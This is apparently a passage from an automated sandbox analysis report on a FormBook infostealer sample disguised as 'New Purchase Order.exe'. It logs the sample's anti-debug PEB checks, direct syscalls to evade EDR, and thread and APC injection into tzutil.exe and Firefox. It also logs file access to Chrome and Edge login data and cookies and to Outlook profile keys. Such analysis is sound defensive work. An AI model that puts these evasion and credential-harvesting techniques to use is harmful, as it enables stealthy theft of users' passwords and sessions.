                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018CC89D mov eax, dword ptr fs:[00000030h]3_2_018CC89D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E8C0 mov eax, dword ptr fs:[00000030h]3_2_0186E8C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_019108C0 mov eax, dword ptr fs:[00000030h]3_2_019108C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0190A8E4 mov eax, dword ptr fs:[00000030h]3_2_0190A8E4
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187C8F9 mov eax, dword ptr fs:[00000030h]3_2_0187C8F9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187C8F9 mov eax, dword ptr fs:[00000030h]3_2_0187C8F9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018CC810 mov eax, dword ptr fs:[00000030h]3_2_018CC810
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01862835 mov eax, dword ptr fs:[00000030h]3_2_01862835
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01862835 mov eax, dword ptr fs:[00000030h]3_2_01862835
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01862835 mov eax, dword ptr fs:[00000030h]3_2_01862835
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01862835 mov ecx, dword ptr fs:[00000030h]3_2_01862835
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01862835 mov eax, dword ptr fs:[00000030h]3_2_01862835
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01862835 mov eax, dword ptr fs:[00000030h]3_2_01862835
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E483A mov eax, dword ptr fs:[00000030h]3_2_018E483A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E483A mov eax, dword ptr fs:[00000030h]3_2_018E483A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187A830 mov eax, dword ptr fs:[00000030h]3_2_0187A830
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01852840 mov ecx, dword ptr fs:[00000030h]3_2_01852840
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01870854 mov eax, dword ptr fs:[00000030h]3_2_01870854
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01844859 mov eax, dword ptr fs:[00000030h]3_2_01844859
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01844859 mov eax, dword ptr fs:[00000030h]3_2_01844859
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D6870 mov eax, dword ptr fs:[00000030h]3_2_018D6870
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D6870 mov eax, dword ptr fs:[00000030h]3_2_018D6870
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018CE872 mov eax, dword ptr fs:[00000030h]3_2_018CE872
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018CE872 mov eax, dword ptr fs:[00000030h]3_2_018CE872
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850BBE mov eax, dword ptr fs:[00000030h]3_2_01850BBE
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850BBE mov eax, dword ptr fs:[00000030h]3_2_01850BBE
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F4BB0 mov eax, dword ptr fs:[00000030h]3_2_018F4BB0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F4BB0 mov eax, dword ptr fs:[00000030h]3_2_018F4BB0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01840BCD mov eax, dword ptr fs:[00000030h]3_2_01840BCD
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01840BCD mov eax, dword ptr fs:[00000030h]3_2_01840BCD
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01840BCD mov eax, dword ptr fs:[00000030h]3_2_01840BCD
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01860BCB mov eax, dword ptr fs:[00000030h]3_2_01860BCB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01860BCB mov eax, dword ptr fs:[00000030h]3_2_01860BCB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01860BCB mov eax, dword ptr fs:[00000030h]3_2_01860BCB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EEBD0 mov eax, dword ptr fs:[00000030h]3_2_018EEBD0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01848BF0 mov eax, dword ptr fs:[00000030h]3_2_01848BF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01848BF0 mov eax, dword ptr fs:[00000030h]3_2_01848BF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01848BF0 mov eax, dword ptr fs:[00000030h]3_2_01848BF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186EBFC mov eax, dword ptr fs:[00000030h]3_2_0186EBFC
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018CCBF0 mov eax, dword ptr fs:[00000030h]3_2_018CCBF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01914B00 mov eax, dword ptr fs:[00000030h]3_2_01914B00
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BEB1D mov eax, dword ptr fs:[00000030h]3_2_018BEB1D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BEB1D mov eax, dword ptr fs:[00000030h]3_2_018BEB1D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BEB1D mov eax, dword ptr fs:[00000030h]3_2_018BEB1D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BEB1D mov eax, dword ptr fs:[00000030h]3_2_018BEB1D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BEB1D mov eax, dword ptr fs:[00000030h]3_2_018BEB1D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BEB1D mov eax, dword ptr fs:[00000030h]3_2_018BEB1D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BEB1D mov eax, dword ptr fs:[00000030h]3_2_018BEB1D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BEB1D mov eax, dword ptr fs:[00000030h]3_2_018BEB1D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BEB1D mov eax, dword ptr fs:[00000030h]3_2_018BEB1D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186EB20 mov eax, dword ptr fs:[00000030h]3_2_0186EB20
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186EB20 mov eax, dword ptr fs:[00000030h]3_2_0186EB20
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01908B28 mov eax, dword ptr fs:[00000030h]3_2_01908B28
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01908B28 mov eax, dword ptr fs:[00000030h]3_2_01908B28
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F4B4B mov eax, dword ptr fs:[00000030h]3_2_018F4B4B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F4B4B mov eax, dword ptr fs:[00000030h]3_2_018F4B4B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01912B57 mov eax, dword ptr fs:[00000030h]3_2_01912B57
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01912B57 mov eax, dword ptr fs:[00000030h]3_2_01912B57
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01912B57 mov eax, dword ptr fs:[00000030h]3_2_01912B57
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01912B57 mov eax, dword ptr fs:[00000030h]3_2_01912B57
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E8B42 mov eax, dword ptr fs:[00000030h]3_2_018E8B42
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D6B40 mov eax, dword ptr fs:[00000030h]3_2_018D6B40
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D6B40 mov eax, dword ptr fs:[00000030h]3_2_018D6B40
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0190AB40 mov eax, dword ptr fs:[00000030h]3_2_0190AB40
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01838B50 mov eax, dword ptr fs:[00000030h]3_2_01838B50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EEB50 mov eax, dword ptr fs:[00000030h]3_2_018EEB50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183CB7E mov eax, dword ptr fs:[00000030h]3_2_0183CB7E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184EA80 mov eax, dword ptr fs:[00000030h]3_2_0184EA80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184EA80 mov eax, dword ptr fs:[00000030h]3_2_0184EA80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184EA80 mov eax, dword ptr fs:[00000030h]3_2_0184EA80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184EA80 mov eax, dword ptr fs:[00000030h]3_2_0184EA80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184EA80 mov eax, dword ptr fs:[00000030h]3_2_0184EA80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184EA80 mov eax, dword ptr fs:[00000030h]3_2_0184EA80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184EA80 mov eax, dword ptr fs:[00000030h]3_2_0184EA80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184EA80 mov eax, dword ptr fs:[00000030h]3_2_0184EA80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184EA80 mov eax, dword ptr fs:[00000030h]3_2_0184EA80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01914A80 mov eax, dword ptr fs:[00000030h]3_2_01914A80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01878A90 mov edx, dword ptr fs:[00000030h]3_2_01878A90
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01848AA0 mov eax, dword ptr fs:[00000030h]3_2_01848AA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01848AA0 mov eax, dword ptr fs:[00000030h]3_2_01848AA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01896AA4 mov eax, dword ptr fs:[00000030h]3_2_01896AA4
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01896ACC mov eax, dword ptr fs:[00000030h]3_2_01896ACC
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01896ACC mov eax, dword ptr fs:[00000030h]3_2_01896ACC
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01896ACC mov eax, dword ptr fs:[00000030h]3_2_01896ACC
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01840AD0 mov eax, dword ptr fs:[00000030h]3_2_01840AD0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01874AD0 mov eax, dword ptr fs:[00000030h]3_2_01874AD0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01874AD0 mov eax, dword ptr fs:[00000030h]3_2_01874AD0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187AAEE mov eax, dword ptr fs:[00000030h]3_2_0187AAEE
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187AAEE mov eax, dword ptr fs:[00000030h]3_2_0187AAEE
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018CCA11 mov eax, dword ptr fs:[00000030h]3_2_018CCA11
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187CA24 mov eax, dword ptr fs:[00000030h]3_2_0187CA24
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186EA2E mov eax, dword ptr fs:[00000030h]3_2_0186EA2E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01864A35 mov eax, dword ptr fs:[00000030h]3_2_01864A35
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01864A35 mov eax, dword ptr fs:[00000030h]3_2_01864A35
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187CA38 mov eax, dword ptr fs:[00000030h]3_2_0187CA38
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01846A50 mov eax, dword ptr fs:[00000030h]3_2_01846A50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01846A50 mov eax, dword ptr fs:[00000030h]3_2_01846A50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01846A50 mov eax, dword ptr fs:[00000030h]3_2_01846A50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01846A50 mov eax, dword ptr fs:[00000030h]3_2_01846A50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01846A50 mov eax, dword ptr fs:[00000030h]3_2_01846A50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01846A50 mov eax, dword ptr fs:[00000030h]3_2_01846A50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01846A50 mov eax, dword ptr fs:[00000030h]3_2_01846A50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850A5B mov eax, dword ptr fs:[00000030h]3_2_01850A5B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850A5B mov eax, dword ptr fs:[00000030h]3_2_01850A5B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187CA6F mov eax, dword ptr fs:[00000030h]3_2_0187CA6F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187CA6F mov eax, dword ptr fs:[00000030h]3_2_0187CA6F
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtProtectVirtualMemory: Direct from: 0x77542F9CJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtSetInformationProcess: Direct from: 0x77542C5CJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtOpenKeyEx: Direct from: 0x77542B9CJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtProtectVirtualMemory: Direct from: 0x77537B2EJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtCreateFile: Direct from: 0x77542FECJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtOpenFile: Direct from: 0x77542DCCJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtQueryInformationToken: Direct from: 0x77542CACJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtTerminateThread: Direct from: 0x77542FCCJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtDeviceIoControlFile: Direct from: 0x77542AECJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtAllocateVirtualMemory: Direct from: 0x77542BECJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2CJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtOpenSection: Direct from: 0x77542E0CJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtAllocateVirtualMemory: Direct from: 0x775448ECJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtSetInformationThread: Direct from: 0x775363F9Jump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtQuerySystemInformation: Direct from: 0x775448CCJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtClose: Direct from: 0x77542B6C
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtReadVirtualMemory: Direct from: 0x77542E8CJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtCreateKey: Direct from: 0x77542C6CJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtSetInformationThread: Direct from: 0x77542B4CJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtQueryAttributesFile: Direct from: 0x77542E6CJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtAllocateVirtualMemory: Direct from: 0x77543C9CJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtCreateUserProcess: Direct from: 0x7754371CJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtQueryInformationProcess: Direct from: 0x77542C26Jump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtResumeThread: Direct from: 0x77542FBCJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtWriteVirtualMemory: Direct from: 0x7754490CJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtDelayExecution: Direct from: 0x77542DDCJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtAllocateVirtualMemory: Direct from: 0x77542BFCJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtReadFile: Direct from: 0x77542ADCJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtQuerySystemInformation: Direct from: 0x77542DFCJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtResumeThread: Direct from: 0x775436ACJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtNotifyChangeKey: Direct from: 0x77543C2CJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtCreateMutant: Direct from: 0x775435CCJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeNtMapViewOfSection: Direct from: 0x77542D1CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: NULL target: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: NULL target: C:\Windows\SysWOW64\tzutil.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\tzutil.exeThread register set: target process: 1184Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\tzutil.exeThread APC queued: target process: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"Jump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: snpURZzZKgO.exe, 00000005.00000000.1849626686.0000000001371000.00000002.00000001.00040000.00000000.sdmp, snpURZzZKgO.exe, 00000005.00000002.2611278747.0000000001371000.00000002.00000001.00040000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612237374.0000000000C91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: snpURZzZKgO.exe, 00000005.00000000.1849626686.0000000001371000.00000002.00000001.00040000.00000000.sdmp, snpURZzZKgO.exe, 00000005.00000002.2611278747.0000000001371000.00000002.00000001.00040000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612237374.0000000000C91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: snpURZzZKgO.exe, 00000005.00000000.1849626686.0000000001371000.00000002.00000001.00040000.00000000.sdmp, snpURZzZKgO.exe, 00000005.00000002.2611278747.0000000001371000.00000002.00000001.00040000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612237374.0000000000C91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: snpURZzZKgO.exe, 00000005.00000000.1849626686.0000000001371000.00000002.00000001.00040000.00000000.sdmp, snpURZzZKgO.exe, 00000005.00000002.2611278747.0000000001371000.00000002.00000001.00040000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612237374.0000000000C91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Users\user\Desktop\New Purchase Order.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2611954893.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2614825871.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1945000489.0000000001B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2610575297.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1946849090.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2611853715.0000000003450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\tzutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

